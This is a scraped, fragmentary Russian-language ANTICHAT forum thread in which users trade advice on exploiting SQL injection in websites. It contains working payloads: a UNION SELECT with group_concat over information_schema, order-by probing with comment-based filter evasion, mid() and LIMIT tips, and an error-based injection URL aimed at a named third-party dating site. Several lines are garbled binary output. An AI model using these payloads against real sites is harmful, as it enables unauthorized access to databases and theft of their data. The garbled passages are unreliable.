ANTICHAT — форум по информационной безопасности, OSINT и технологиям

а у тебя случяйно не blind injection??

есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и� �я database()'

но вывести можго только 1024 символа

В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ...

а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи?

P.S Error-based тоже юзал..

юзай mid()

а вообще LIMIT бы не мешало сначала

Есть идеи как нибудь раскрутить это?

нет через обычный union вывожу.

c⧱uКч"‡Bњn

dс\ ґЃJК.я-йј

ЛXЫ l[Ж RЂNяїџъ

ХzWt9:fЗРЭh.G

JyM·B>ґ

http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+informati on_schema.tables+group+by(concat(version(),0x00,fl oor(rand(0)*2))))--+

[QUOTE="sl1k"]
sl1k said:
нет через обычный union вывожу.
c⧱uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґґ

и руками и прогой